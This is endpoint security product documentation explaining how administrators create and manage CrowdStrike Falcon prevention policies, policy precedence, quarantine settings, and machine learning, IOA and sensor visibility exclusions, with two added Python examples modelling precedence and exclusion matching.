Create and manage the prevention policies, exclusions, and custom IOCs and IOAs that control what activity is blocked, killed, quarantined, and allowed on your hosts.

Prevention policies

Assign prevention policies to manage the activity that triggers detections and preventions on your hosts, which you can monitor on the Activity dashboard. Policies are platform specific. When you assign a policy to a host group, the policy settings apply to hosts in the group on the corresponding platform. For more info about host groups, see Managing host groups.

For more info about prevention policy settings and recommendations, see Prevention Policy Settings. For more info about how policies work, see Policies in Falcon.

Create a prevention policy
Tip: As an alternative to creating a policy from scratch, you can duplicate an existing policy and then modify its settings as needed. For more info, see Duplicate a prevention policy.
  1. Go to Endpoint security > Configure > Prevention policies.
  2. Click Create policy.
  3. Enter a policy name and select a platform.
  4. Optional. Enter a description.
  5. Click Create policy.
  6. On the Settings tab, enable or disable individual prevention settings.
    Tip: Click the name of a setting to open the corresponding details panel showing descriptions and recommendations.
  7. In the Cloud machine learning and Sensor machine learning sections, select a protection level for each setting you want to enable.
  8. To save your prevention policy settings, click Save, then click Confirm.
  9. To enable the policy, click Enable policy.
Assign host groups to a prevention policy
  1. Go to Endpoint security > Configure > Prevention policies.
  2. Click Platform and select a policy platform.
  3. Click the name of the policy you want to assign host groups to.
  4. Click the Assigned host groups tab.
  5. Click Assign host groups.
  6. Select the host groups you want to assign.
  7. Click Assign groups.
Assign custom IOAs to a prevention policy

Assign custom indicators of attack (IOA) rules to a policy to protect host groups from undesirable behaviors specific to your organization. For more info, see Custom IOA rules.

  1. Go to Endpoint security > Configure > Prevention policies.
  2. Click Platform and select a policy platform.
  3. Click the name of the policy you want to assign custom IOAs to.
  4. Click the Assigned custom IOAs tab.
  5. Click Assign rule group.
  6. Select the rule groups you want to assign.
  7. Click Assign groups.
Edit a prevention policy
To edit an existing policy:
  1. Go to Endpoint security > Configure > Prevention policies.
  2. Click Platform and select a policy platform.
  3. Click the name of the policy that you want to edit.
  4. Edit the policy settings as needed.
  5. Click Save.
  6. Click Save to confirm the changes to the policy.
Duplicate a prevention policy

As an alternative method for creating a detection and prevention policy, you can duplicate an existing policy and then modify the settings as needed.

Duplicate policies inherit the settings of the original policy. By default, duplicated policies are disabled.

A policy and its duplicate are independent of each other. Changes to either policy are not reflected in the other.

  1. Go to Endpoint security > Configure > Prevention policies.
  2. Click Platform and select a policy platform.
  3. Click the name of the policy you want to duplicate.
  4. Click Duplicate policy.
  5. Edit the policy name and optional description.
  6. To assign the same host groups assigned to the original policy, select Duplicate assigned host groups.
  7. To assign the same custom IOA rule groups assigned to the original policy, select Duplicate assigned custom IOA rule groups.
  8. Click Duplicate.

You can now modify the new policy settings, assign host groups, and enable the policy as needed.

Disable a prevention policy

You can temporarily suspend a policy by disabling it. When you disable a policy, the policy is disabled for online hosts. For offline hosts, the policy is disabled when the hosts come back online.

Note: When you disable a policy, assigned hosts are reassigned another policy based on policy precedence. For more info, see Policy precedence.
  1. Go to Endpoint security > Configure > Prevention policies.
  2. Click Platform and select a policy platform.
  3. Click the name of the policy you want to disable.
  4. Click Disable policy.
  5. Click Disable policy to confirm the action.
Delete a prevention policy

You can permanently remove a policy by deleting it. You must disable the policy before you can delete it.

Note: When you delete a policy, assigned hosts are reassigned another policy based on policy precedence. For more info, see Policy precedence.
  1. Go to Endpoint security > Configure > Prevention policies.
  2. Click Platform and select a policy platform.
  3. Click the name of the policy you want to delete.
  4. On the Settings tab, click Delete.

  5. Click Delete Policy.

Policy precedence

Hosts can belong to multiple host groups, and host groups can be assigned to multiple policies, so a host can end up with several assigned policies. Policy precedence determines which policy applies. Each policy is assigned a precedence value, where 1 is the highest. When a host has multiple assigned policies, the policy with the higher precedence applies.

If something changes with that highest-ranking policy, for example if the policy is disabled, then the next highest-ranking policy applies.

Note: For each platform, there is a default policy that applies to all hosts that don't have an assigned policy. Configure default policies with the most conservative settings you’re comfortable applying.

With dynamic host groups, a host with a newly-installed sensor inherits the relevant host group assignments and applies the policy with highest precedence. If changes to a host affect dynamic host group assignment, policy assignment might also be affected. For example, an OS upgrade or an OU reassignment might move a host to a host group with a different policy.
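The following is an added example, not CrowdStrike code, that models the precedence rules above: a host's active policy is the highest-ranked enabled policy assigned to one of its groups, the default policy applies when none matches, and disabling the top-ranked policy drops the host to the next one. The data structures, policy names and host groups are constructed for illustration.

```python
# Added example (not CrowdStrike code): a small model of Falcon prevention
# policy precedence. Assumptions: policies are per-platform, precedence 1 is
# the highest rank, and the default policy has no precedence value and applies
# only when no enabled, assigned policy matches the host.
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Policy:
    name: str
    platform: str                      # e.g. "Windows", "Mac", "Linux"
    precedence: Optional[int] = None   # 1 = highest; None for the default policy
    enabled: bool = True
    host_groups: set = field(default_factory=set)
    is_default: bool = False


@dataclass
class Host:
    name: str
    platform: str
    groups: set = field(default_factory=set)


def effective_policy(host: Host, policies: list) -> Optional[Policy]:
    """Return the policy that applies to `host`.

    A policy is a candidate when it targets the host's platform, is enabled,
    and is assigned to at least one host group the host belongs to. Among the
    candidates the lowest precedence number (highest rank) wins. If there is
    no candidate, the platform's default policy applies.
    """
    candidates = [
        p for p in policies
        if p.platform == host.platform
        and p.enabled
        and not p.is_default
        and p.host_groups & host.groups
    ]
    if candidates:
        return min(candidates, key=lambda p: p.precedence)
    for p in policies:
        if p.is_default and p.platform == host.platform:
            return p
    return None


def preview_disable(policy_name: str, hosts: list, policies: list) -> dict:
    """Show which hosts would be reassigned if `policy_name` were disabled.

    Returns {host name: (policy before, policy after)} for every host whose
    active policy would change. Disabled (or deleted) policies do not leave
    hosts unprotected; the hosts fall to the next-ranked policy or the
    default, which may be weaker, so check the impact before disabling.
    """
    trial = [
        Policy(p.name, p.platform, p.precedence,
               p.enabled and p.name != policy_name,
               set(p.host_groups), p.is_default)
        for p in policies
    ]
    changes = {}
    for h in hosts:
        before = effective_policy(h, policies)
        after = effective_policy(h, trial)
        before_name = before.name if before else None
        after_name = after.name if after else None
        if before_name != after_name:
            changes[h.name] = (before_name, after_name)
    return changes


# Constructed sample data (not from a real tenant).
POLICIES = [
    Policy("Servers - Strict", "Windows", precedence=1, host_groups={"windows-servers"}),
    Policy("Engineering", "Windows", precedence=2, host_groups={"engineering"}),
    Policy("Workstation Baseline", "Windows", precedence=3, host_groups={"all-windows"}),
    Policy("Default (Windows)", "Windows", is_default=True),
]

HOSTS = [
    Host("build01", "Windows", {"windows-servers", "all-windows"}),
    Host("dev-laptop", "Windows", {"engineering", "all-windows"}),
    Host("kiosk", "Windows", {"all-windows"}),
    Host("new-sensor", "Windows", set()),  # freshly installed, no group membership yet
]

if __name__ == "__main__":
    for h in HOSTS:
        print(f"{h.name:12} -> {effective_policy(h, POLICIES).name}")
    print("Disabling 'Servers - Strict' would change:",
          preview_disable("Servers - Strict", HOSTS, POLICIES))
```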

Change policy precedence
  1. Go to Endpoint security > Configure > Prevention policies.
  2. Click Edit precedence.
  3. For a policy in the table, click and drag the corresponding arrow to change its precedence.
  4. Click Save.

Verify the active policy

To ensure that the proper settings are applied to your hosts, check a group or host to verify the active policy.

Show a group’s policy precedence by going to Host setup and management > Manage endpoints > Host groups and selecting the group’s row.


Screenshot of the policy precedence of a group on the Groups page

Alternatively, you can view a host’s applied policies by searching for it in Host setup and management > Manage endpoints > Host management. The active policies are listed in the columns to the right.


Screenshot of applied policies on the Host Management page

Below is a diagram outlining how policy precedence works along with the impact to assigned hosts and pending hosts:


Diagram showing how policy precedence is evaluated on a host
Quarantined files

The Falcon sensor can quarantine suspicious files based on your prevention policies. When the Falcon sensor detects a suspicious file attempting to run, the file is encoded, renamed, and moved into a quarantine directory on its host.

To use quarantining, you first enable it using a prevention policy. You can review and take action on quarantined files when monitoring detections.

Note: Quarantined files can include executable files, dynamic-link libraries (DLLs), and other non-process executable file types written by a process, such as config text files. If you have files that you don't want to be quarantined and sent to the CrowdStrike cloud, set up an exclusion. For more info, see Exclusions.
About quarantine
  • File location: Quarantined files are placed in a compressed file on the host in the quarantine directory:

    • Windows hosts: \Windows\System32\Drivers\CrowdStrike\Quarantine

    • Mac hosts: /Library/Application Support/CrowdStrike/Falcon/Quarantine

    • Linux hosts: /opt/CrowdStrike/Quarantine

  • File retention:

    • Quarantined files are deleted from the host after 30 days. You can release files to prevent them from being deleted. For more info, see About Endpoint Monitoring.

    • Quarantined files are deleted from the CrowdStrike cloud after 90 days.

  • Network containment: If you network contain a host, it continues to quarantine files normally.

  • Prevention policies: If you disable the quarantining prevention policy on a host, no further files will be quarantined on that host. Any files that were previously quarantined remain quarantined.

  • Uninstallation: If you uninstall the sensor, the quarantined files are deleted during uninstallation.

  • Do not use quarantining on a host that uses other antivirus software. Unexpected behavior can result if multiple pieces of software attempt to quarantine the same file.

  • Quarantining does not apply to the following:

    • Exploit mitigation

    • Ransomware

    • Exploitation Behavior

    • Lateral Movement and Credential Access

Enable quarantine
Note: On Windows Server 2016, Server 2019, and Server 2022, Windows Defender is enabled by default. Because Windows Server operating systems do not have Windows Security Center, the sensor can't register with it and disable Windows Defender automatically, as it does on Windows 10. To use quarantine on these operating systems, you must disable Defender. For more info, see Services.

Enable or configure quarantining on hosts using prevention policies.

  1. Find the host's prevention policy in Endpoint security > Configure > Prevention policies.

  2. Find the entry with a type of Next-Gen Antivirus and a category of Quarantine. Click Enable All.

    Note: When this setting is enabled, we recommend setting anti-malware prevention levels to Moderate and not using other antivirus solutions. For hosts that run Windows, CrowdStrike Falcon registers with Windows Security Center, disabling Windows Defender.

Custom settings and configurations

Exclusions
Overview

If the Falcon console is showing detections that you don’t want to see, or is preventing activity that you want to allow, you can create exclusions to prevent detections from being generated, or to allow trusted processes to run.

  • For info about excluding detections generated from integrated third-party data, see Third-Party Detection Exclusions.
  • For info about configuring mobile detection exclusions, see Excluding mobile detections.
  • For info about configuring Falcon Data Protection detection exclusions, see About detections.

Requirements

Subscriptions: Falcon Insight XDR or Falcon Prevent

Sensor support:

  • Machine learning (file path) exclusions: All supported versions of Falcon sensor for macOS, Windows, and Linux
    Note: Falcon Container does not support exclusions for pods.
  • Machine learning (certificate) exclusions: Falcon sensor for Windows version 7.20 and later
  • IOA exclusions: All supported versions of Falcon sensor for macOS, Windows, and Linux

  • Sensor visibility exclusions: All supported versions of Falcon sensor for macOS, Windows, and Linux

    Note: Support for parent or grandparent process context in Machine learning (file path) exclusions and IOA exclusions is only available in Falcon sensors for Mac, Windows, and Linux version 7.33 and later. Attempting to apply parent or grandparent fields to unsupported sensors will have no effect on your exclusions.

Roles:

  • These roles can create and manage exclusions:

    • Falcon Administrator

    • Detections Exceptions Manager

  • These roles can view exclusions, exclusion audit logs, and IOA exclusion activity logs:

    • Falcon Endpoint Manager

    • Falcon Analyst

    • Falcon Analyst - Read Only

    • Falcon Security Lead

    • Falcon Investigator

    • Custom IOAs Manager

    • Desktop Support Analyst

    • Device Control Manager

    • Endpoint Manager

    • EPP Detection Admin

    • EPP Analyst

    • Falcon Admin

    • Flight Control Managed Analyst

    • Firewall Manager

    • Help Desk Analyst

    • CSPM Admin

    • CSPM Analyst

    • CSPM Read Only Analyst

    • Identity Protection Administrator

    • Identity Protection Domain Administrator

    • Identity Protection Policy Manager

    • Falcon Container Image Admin

    • Mobile Admin

    • Prevention Policy Manager

    • Quarantine Manager

    • Remediation Manager

    • Real Time Responder - Active Responder

    • Real Time Responder - Read Only Analyst

    • Real Time Responder - Administrator

    • Workflow Author

Before you begin

Exclusions are applied to hosts based on their group membership. Set up host groups before you create an exclusion. For more info, see Manage Host Groups.

Exclusions let you create a specific allowlist, but they aren’t the only way to adjust the detections you see. Review your prevention policy settings to see if any policies are set to a level that's more aggressive than recommended by our best practices. These policies might trigger certain detections about activity that you don’t need to see. For more info, see Prevention Policy Settings.

Understand exclusions

Occasionally, Falcon might detect or prevent activity that you expect and allow in your environment. By creating exclusions, you can stop seeing detections that you don’t want to see, and allow processes that would otherwise be prevented. The exclusions that you create effectively form an allowlist that explicitly defines your organization’s known trusted activity.

You can create these types of exclusions:

  • Machine learning (file path) exclusion
    • Description: For trusted file paths, stop all ML-based detections and preventions, or stop files from being uploaded to the CrowdStrike cloud.
    • Supports parent or grandparent process context? Yes
    • Events logged? Yes

  • Machine learning (certificate) exclusion
    • Description: For files signed by a specific certificate that is trusted on the target endpoint, stop all ML-based detections and preventions, or stop files from being uploaded.
    • Supports parent or grandparent process context? No
    • Events logged? Yes

  • Indicator of attack (IOA) exclusion
    • Description: Stop all behavioral detections and preventions for an IOA that’s based on a CrowdStrike-generated detection, including runtime container drift.
    • Supports parent or grandparent process context? Yes
    • Events logged? Yes

  • Sensor visibility exclusion
    • Description: For trusted file paths that you want to exclude from sensor monitoring, minimize sensor event collection, and stop all associated detections and preventions. Use sensor visibility exclusions with extreme caution. Potential attacks and malware associated with excluded files will not be recorded, detected, or prevented.
    • Supports parent or grandparent process context? No
    • Events logged? Most events are not logged

Machine learning exclusions

Reduce false-positive detections by creating machine learning exclusions. Define file path patterns or select a certificate to exclude files from detections or preventions derived from machine learning techniques. You can use these exclusions to stop static file-based detections and preventions through machine learning techniques or custom hash blocklists. You can also stop file uploads to the CrowdStrike cloud.

Note: Machine learning (certificate) exclusions do not apply to files located on Compact Disc File System (CDFS) or network file shares.

Considerations for machine learning exclusions

A machine learning exclusion has three configurable parts:

  • Exclusion definition:
    • For file path exclusions: An exclusion pattern that defines a file path, name, or extension. Exclusion patterns are written in glob syntax. For more info, see Glob Syntax.

      • Optional. You can also define an exclusion pattern with a parent or grandparent process to match. This allows you to define more granular exclusions, which reduces the potential attack surface.

        Important: On-demand scans and some cloud detections do not use parent and grandparent exclusion definitions.
    • For certificate exclusions: A trusted certificate that is used to digitally sign a file.
  • An exclusion type that defines the type of activity that you want to exclude. Choose one or both exclusion types:

    • Detect/Prevent

    • For file path exclusions only: Upload Files to CrowdStrike

      Note: CrowdStrike ignores parent and grandparent exclusion fields for file uploads.
  • A set of hosts that the exclusion applies to. Choose all hosts or select specific host groups.

Detect/Prevent

Any file matching the exclusion pattern or signed by an excluded certificate won’t be detected or blocked by the Falcon sensor. The activity is logged through events sent to the CrowdStrike cloud, but a detection is not generated.

The most common reason to create a Detect/Prevent exclusion is to minimize false-positive detections for trusted applications. For example, your organization might use an internal tool that's blocked by the Falcon sensor. You can create an exclusion to permit that tool to run without triggering a Detect or Prevent action.

Create Detect/Prevent exclusions to target very specific situations. If your exclusion is too broad, you might inadvertently permit malicious activity that should be detected or blocked.

Optionally, you can also define a parent or grandparent process lineage that must match for the file path exclusion to apply. For example, instead of only excluding MyApp.exe, you can also define the parent process that is expected to execute MyApp.exe, such as ITTool.exe. In this example, MyApp.exe is only allowed to run without triggering a Detect or Prevent action if ITTool.exe directly runs it.
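The following is an added example, not CrowdStrike code, that models the MyApp.exe / ITTool.exe scenario above and the earlier note that parent and grandparent fields are ignored for file uploads. It assumes Python's fnmatch as a stand-in for Falcon's glob syntax (Falcon's own rules may differ), case-insensitive Windows paths, and that contexts which do not use ancestor definitions match on the primary pattern only; all paths and process lineages are constructed.

```python
# Added example (not CrowdStrike code): how parent/grandparent patterns narrow
# a machine learning (file path) exclusion. Assumptions: fnmatch approximates
# Falcon glob syntax; Windows paths compare case-insensitively; contexts that
# do not use ancestor fields (file uploads, on-demand scans) are modelled as
# matching the primary pattern only.
import fnmatch
from dataclasses import dataclass
from typing import Optional


@dataclass
class Process:
    image_path: str
    parent: Optional["Process"] = None


@dataclass
class FilePathExclusion:
    pattern: str                       # primary pattern: file path, name or extension glob
    parent: Optional[str] = None       # optional parent-process pattern
    grandparent: Optional[str] = None  # optional grandparent-process pattern
    detect_prevent: bool = True        # "Detect/Prevent" exclusion type
    upload: bool = False               # "Upload files to CrowdStrike" exclusion type


def glob_match(pattern: str, path: str) -> bool:
    """Case-insensitive glob comparison (assumption: Windows-style paths)."""
    return fnmatch.fnmatchcase(path.lower(), pattern.lower())


def lineage_matches(excl: FilePathExclusion, proc: Process, use_ancestors: bool = True) -> bool:
    """True when the process image matches the primary pattern and, when
    ancestor patterns are defined and in use, its parent and grandparent
    match as well. A missing ancestor never satisfies an ancestor pattern."""
    if not glob_match(excl.pattern, proc.image_path):
        return False
    if not use_ancestors:
        return True
    parent = proc.parent
    grandparent = parent.parent if parent else None
    if excl.parent is not None:
        if parent is None or not glob_match(excl.parent, parent.image_path):
            return False
    if excl.grandparent is not None:
        if grandparent is None or not glob_match(excl.grandparent, grandparent.image_path):
            return False
    return True


def excluded_from_detect(excl: FilePathExclusion, proc: Process, on_demand_scan: bool = False) -> bool:
    """Would an ML-based detection or prevention for this process be suppressed?
    On-demand scans do not use parent/grandparent definitions (modelled here
    as primary-pattern-only matching, which is an assumption)."""
    return excl.detect_prevent and lineage_matches(excl, proc, use_ancestors=not on_demand_scan)


def excluded_from_upload(excl: FilePathExclusion, file_path: str) -> bool:
    """Would the file be kept from uploading to the CrowdStrike cloud?
    Ancestor fields are ignored for uploads, so only the primary pattern counts."""
    return excl.upload and glob_match(excl.pattern, file_path)


# Constructed lineages: MyApp.exe launched by the IT tool, and the same binary
# launched from a command shell instead.
ITTOOL = Process(r"C:\Tools\ITTool.exe", Process(r"C:\Windows\explorer.exe"))
EXPECTED = Process(r"C:\Tools\MyApp.exe", ITTOOL)
UNEXPECTED = Process(r"C:\Tools\MyApp.exe",
                     Process(r"C:\Windows\System32\cmd.exe", Process(r"C:\Windows\explorer.exe")))

# A narrow exclusion tied to the expected parent, and an over-broad folder glob.
NARROW = FilePathExclusion(r"C:\Tools\MyApp.exe", parent=r"C:\Tools\ITTool.exe")
BROAD = FilePathExclusion(r"C:\Tools\*")
NARROW_UPLOAD = FilePathExclusion(r"C:\Tools\MyApp.exe", parent=r"C:\Tools\ITTool.exe",
                                  detect_prevent=False, upload=True)

if __name__ == "__main__":
    print("narrow, expected lineage  :", excluded_from_detect(NARROW, EXPECTED))
    print("narrow, unexpected lineage:", excluded_from_detect(NARROW, UNEXPECTED))
    print("broad,  unexpected lineage:", excluded_from_detect(BROAD, UNEXPECTED))
    print("upload exclusion, any lineage:", excluded_from_upload(NARROW_UPLOAD, UNEXPECTED.image_path))
```

The broad folder glob suppresses the unexpected launch that the narrow, parent-scoped exclusion still leaves visible, which is the risk the paragraph above warns about.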

Upload files to CrowdStrike

Any file matching the exclusion pattern or signed by an excluded certificate won't be available for download in Endpoint security > Monitor > Quarantined files, and those files aren't uploaded to the CrowdStrike cloud for analysis.

The most common reason to create this type of exclusion is to prevent certain executable files from being uploaded to the CrowdStrike cloud. For example, you might want to prevent uploads of self-extracting archives containing design files from the group of hosts that includes your engineering department's workstations.

Uploading files to CrowdStrike is disabled by default. To enable it, go to Support and resources > General settings, click Quarantined files, and turn on Upload quarantined files.
Note: Files larger than 32 MB will not be uploaded to the CrowdStrike cloud.

IOA exclusions

Reduce false-positive detection alerts from IOAs by creating exclusions that stop behavioral IOA detections and preventions. You can create an IOA exclusion directly from a CrowdStrike-generated detection, or by duplicating and then modifying an existing IOA exclusion.

Most types of IOA detections can be excluded through the Falcon console. However, some types of detections (OverWatch detections, custom IOA detections, and some others) cannot be excluded.

Considerations for IOA exclusions

Most IOA exclusions, including runtime container drift detections, are created from within a detection, or by duplicating and then modifying an existing IOA exclusion. Container drift exclusions are managed from Cloud Security. For more info, see Create exclusions to allow expected container drift.

You can exclude most types of IOA detections. However, the following types of detections cannot be excluded:

  • OverWatch detections: For assistance with OverWatch detections, contact Support

  • Forced Address Space Layout Randomization (ASLR) bypass preventions

  • Forced Data Execution Protection (DEP) preventions

  • Heap Spray Preallocation preventions

  • A small set of internal detection types

  • Container drift events in containers protected by the Falcon Container sensor for Linux

In most cases, the Falcon console indicates whether you can exclude a specific IOA detection. If you want to exclude a detection that Falcon indicates cannot be excluded, open a Support case.

Sensor visibility exclusions

For trusted file paths that you want to exclude from sensor monitoring, sensor visibility exclusions minimize sensor event collection, and stop all associated detections and preventions.

Important: Use sensor visibility exclusions with extreme caution. Potential attacks and malware associated with excluded files are not recorded, detected, or prevented.

The most common reason to create a sensor visibility exclusion is to improve endpoint performance at the excluded file paths, where sensor event data collection might interfere with highly resource-sensitive tasks. When planning and configuring sensor visibility exclusions, balance performance and security considerations. We recommend using sensor visibility exclusions only on hosts for which the sensor’s performance overhead without exclusions is unacceptable, and we recommend choosing excluded paths with care.

Considerations for sensor visibility exclusions

Use sensor visibility exclusions with extreme caution. If you create a sensor visibility exclusion for a file path, Falcon won’t record all events, won’t report any detections, and won’t perform any prevention actions. On that file path, you won’t have visibility into potential attacks or malware.

When planning and configuring sensor visibility exclusions, balance performance and security considerations. We recommend using sensor visibility exclusions only on hosts for which the sensor’s performance overhead without exclusions is unacceptable, and we recommend choosing excluded paths with care.

Before creating sensor visibility exclusions, consider the potential security risks. If you do create sensor visibility exclusions, we recommend following these best practices:

  • Configure exclusions to be as narrow as possible. It’s safer to exclude a single executable file than an entire folder or all subfolders.

  • Avoid specifying file exclusions for built-in operating system executable files and folders, such as these:

    • bash, /sbin, /bin, /usr/bin

    • java, python, ruby

Additional sensor visibility exclusion considerations:

  • The sensor minimizes event reporting for process executions that match file exclusion criteria.

  • Processes that match file exclusion criteria no longer generate the majority of events that would be seen otherwise, including process-related events.

  • The sensor continues to send EndOfProcess events on Windows and macOS.

  • Process tree and file name are still captured, but the SHA256 digest is not.

  • For excluded processes, data is not available in the following features and contexts:

    • Any app usage dashboard (for example, in asset management)

    • Hash search (Falcon Investigate)

    • FDRv2 app info

  • Excluding container-relative paths (and more generally, paths inside a chroot) is not supported.

  • At this time, any Linux sensor visibility exclusions apply to both the host and all containers running on the system.

Plan your exclusions

Consider the potential implications of an exclusion before you put it into effect in your environment.

To maintain a strong security posture, create exclusions to be as specific as possible while meeting your exclusion needs. If your exclusion is too broad, you might inadvertently permit malicious activity that should be detected or blocked.

When you're creating or editing an IOA exclusion other than a container drift event exclusion, the Falcon console displays a list of affected detections before you save it. This list shows detections that wouldn’t have been generated if the current exclusion were live in your environment. Previewing detections that you would no longer see helps you quickly understand the expected effect of an exclusion before you save it.

For IOA exclusions that are already in effect in your environment, go to Endpoint security > Configure > Exclusions. Click IOA Exclusions, then See Activity to view a log of activity that would have triggered a detection if an IOA exclusion hadn’t been in place. Reviewing activity that’s being excluded helps you understand the actual effects of your IOA exclusions.

CrowdStrike automatically records all changes to your exclusions. Each exclusion type has its own audit log where you can view the revision history for exclusions of that type. We recommend that you include a comment for the audit log whenever you create, edit, or delete an exclusion. In the audit log comment, include any info that would help other people in your organization understand what you changed and why. For example, when creating or editing an exclusion, include info about what activity was excluded and why.
Note: Exclusion audit logs are retained for 90 days.

After you create, edit, or delete an exclusion, it can take up to 40 minutes for the changes to go into effect.

Manage machine learning exclusions

View machine learning exclusions

The Machine learning (file path) exclusions tab and Machine learning (certificate) exclusions tab are where you can view, create, edit, and delete ML exclusions, and where you can view the ML exclusion audit log. By default, the list of exclusions is sorted by Last modified.

Machine learning (file path) exclusions

Create machine learning (file path) exclusions from within a detection

Create a machine learning (file path) exclusion from within a detection. The exclusion pattern is pre-populated based on the detection. Verify or change the pattern as needed before saving the exclusion.

  1. On Endpoint security > Monitor > Endpoint detections, for the machine learning detection that you want to create an exclusion from, click to expand the detection’s Summary.

  2. From the Actions menu, click Create ML exclusion (file path).

  3. In Create machine learning exclusion, search for the host groups that the exclusion will apply to or select All hosts, and then click Next.

  4. In the Excluded from list, select the actions to apply to the selected host groups:

    • Detections and preventions: Excludes files from ML-based detections and preventions.

    • Uploads to CrowdStrike: Excludes files from being uploaded to the CrowdStrike cloud.

  5. In the primary Exclusion pattern field, verify the prepopulated pattern value or enter a new pattern in glob syntax. For more info, see Glob Syntax.

  6. Optional. Select the ancestor exclusion patterns toggle to reveal and edit parent or grandparent patterns. The toggle displays Include ancestor exclusion patterns by default and changes to Hiding ancestor exclusion patterns when disabled. Edit the exclusion pattern in glob syntax.
  7. Optional. Under Pattern test value, test the exclusion pattern for each pattern type:

    1. Type a file path, and then click Test pattern.

    2. Check the confirmation message to see whether your test pattern matches the syntax.

  8. Recommended. Enter a comment to include in the audit log.

  9. Optional. If you want to add another exclusion pattern after you save this one, select Create another exclusion with these hosts after saving.

  10. Click Create Exclusion.

    Note: You must enable a new exclusion in order for it to take effect.

Create machine learning (file path) exclusions from the exclusions tab

Alternatively, you can create a machine learning exclusion on the Machine learning (file path) exclusions tab.
  1. Go to Endpoint security > Configure > Exclusions, and then go to the Machine learning (file path) exclusions tab.

  2. Click Create exclusion.

  3. In Create machine learning exclusion, select the host groups that the exclusion will apply to or select All hosts, and then click Next.

  4. In the Excluded from list, select the actions to apply to the selected host groups:

    1. Detections and preventions: Excludes files from ML-based detections and preventions.

    2. Uploads to CrowdStrike: Excludes files from being uploaded to the CrowdStrike cloud.

  5. In the primary Exclusion pattern field, verify the pre-populated pattern value or enter a new pattern in glob syntax. For more info, see Glob Syntax.

  6. Optional. Select the ancestor exclusion patterns toggle to reveal and edit parent or grandparent patterns. The toggle displays Include ancestor exclusion patterns by default and changes to Hiding ancestor exclusion patterns when disabled. Edit the exclusion pattern in glob syntax.
  7. Optional. Under Pattern test value, test the exclusion pattern for each pattern type:

    1. Type a file path, and then click Test pattern.

    2. Check the confirmation message to see whether your test pattern matches the syntax.

  8. Recommended. Enter a comment to include in the audit log.

  9. Optional. If you want to add another exclusion pattern after you save this one, select Create another exclusion with these hosts after saving.

  10. Click Create Exclusion.

    Note: You must enable a new exclusion in order for it to take effect.

Edit machine learning (file path) exclusions

Modify an existing exclusion to stop ML-based detections and preventions, or to stop file uploads to the CrowdStrike cloud, for a trusted file path.

  1. Go to Endpoint security > Configure > Exclusions, and then go to the Machine learning (file path) exclusions tab.

  2. Click Open menu for the exclusion that you want to modify, and then click Edit.

  3. In Edit machine learning exclusion, select Groups of hosts and add the groups that the exclusion will apply to, or select All hosts.

  4. In the Excluded from list, select the actions to apply to the selected host groups:

    • Detections and preventions: Excludes files from ML-based detections and preventions.

    • Uploads to CrowdStrike: Excludes files from being uploaded to the CrowdStrike cloud.

  5. In the Exclusion pattern field, enter an exclusion pattern in Glob Syntax.

  6. Optional. Select the ancestor exclusion patterns toggle to reveal and edit parent or grandparent patterns. The toggle displays Include ancestor exclusion patterns by default and changes to Hiding ancestor exclusion patterns when disabled. Edit the exclusion pattern in glob syntax.
  7. Recommended. Enter a comment to include in the audit log.

  8. Optional. Under Pattern test value, test the exclusion pattern for each pattern type:

    1. Type a file path, and then click Test pattern.

    2. Check the confirmation message to see whether your test pattern matches the syntax.

  9. Click Save.

Machine learning (certificate) exclusions

Create machine learning (certificate) exclusions from within a detection

Create a machine learning (certificate) exclusion from within a detection. Available exclusion certificates are pre-populated based on the detection.

  1. On Endpoint security > Monitor > Endpoint detections, for the machine learning detection that you want to create an exclusion from, click to expand the detection’s Summary.
  2. From the Actions menu, click Create ML exclusion (certificate).
  3. In Create machine learning exclusion, select the host groups that the exclusion will apply to or select All hosts, and then click Next.
    Note: For customers with Falcon Flight Control, choose the child CIDs that the exclusion will apply to.
  4. In Select a certificate, select either Leaf certificates only or Full certificate chain to view the certificates available for exclusion.
  5. In the Signature chain section, select the desired certificate.
    Note: The certificate that you select must be trusted on the target endpoint.
    Note: In most cases, only the leaf certificate should be used in order to keep the exclusion scope as narrow as possible.
  6. Click Next.
  7. Optional. Update the Description.
  8. Recommended. Add a comment for the audit log.
  9. Optional. Select Create another exclusion with these host groups after saving.
  10. Click Create exclusion. Your new exclusion is displayed on the Machine learning (certificate) exclusions tab of the Exclusions page.
Notes:
  • You must enable a new exclusion in order for it to take effect.
  • On build servers, compiling executables and signing executables are two distinct actions. Detect on-Write (DoW) still detects compiled executables before they are signed, so false positives at this stage of the build pipeline still require file path-based ML exclusions.

Create machine learning (certificate) exclusions from the exclusions tab

Alternatively, you can create a machine learning exclusion on the Machine learning (certificate) exclusions tab.

  1. Go to Endpoint security > Configure > Exclusions, and then go to the Machine learning (certificate) exclusions tab.
  2. Click Create exclusion.
  3. In Create machine learning exclusion, select Groups of hosts and add the host groups that the exclusion will apply to or select All hosts, and then click Next.
    Note: For customers with Falcon Flight Control, choose the child CIDs for the exclusion to target.
  4. Select a PE file or certificate to upload.
  5. In Signature chain, select the PE file or certificate that you uploaded, and then click Next.
  6. Recommended. Update the Description and add a comment for the audit log.
  7. Click Create exclusion.
Notes:
  • You must enable a new exclusion in order for it to take effect.
  • To upload a certificate or file to the Falcon console for exclusions, your browser must have WebAssembly (Wasm) enabled. Most browsers should already have this enabled by default.
  • Supported certificate file formats for upload include .PEM and .CER.

Edit machine learning (certificate) exclusions

Modify an existing exclusion to stop ML-based detections and preventions, for a trusted certificate.

  1. Go to Endpoint security > Configure > Exclusions, and then go to the Machine learning (certificate) exclusions tab.
  2. Click Open menu for the exclusion that you want to modify, and then click Edit.

  3. In Edit machine learning exclusion, select Groups of hosts and add the host groups that the exclusion will apply to, or select All hosts.
  4. Click Next.
  5. Optional. Update the Description.
  6. Recommended. Add a comment for the audit log.
  7. Click Save.

Duplicate machine learning (certificate) exclusions

  1. Go to Endpoint security > Configure > Exclusions, and then go to the Machine learning (certificate) exclusions tab.
  2. Click Open menu for the exclusion that you want to duplicate, and then click Duplicate.

  3. Edit the newly duplicated exclusion as needed.

Delete machine learning exclusions

Delete exclusions with caution. A deleted exclusion cannot be recovered.

  1. Go to Endpoint security > Configure > Exclusions, and then go to the Machine learning (file path) exclusions tab or the Machine learning (certificate) exclusions tab.

  2. Click Open menu for the exclusion that you want to delete, and then click Delete.

  3. Recommended. Review any details about the exclusion to be deleted and enter a comment to include in the audit log.

  4. Click Delete exclusion.

Export machine learning exclusions

Export a report for machine learning exclusions.
  1. Go to Endpoint security > Configure > Exclusions, and then go to the Machine learning (file path) exclusions tab or the Machine learning (certificate) exclusions tab.

  2. Click Export.

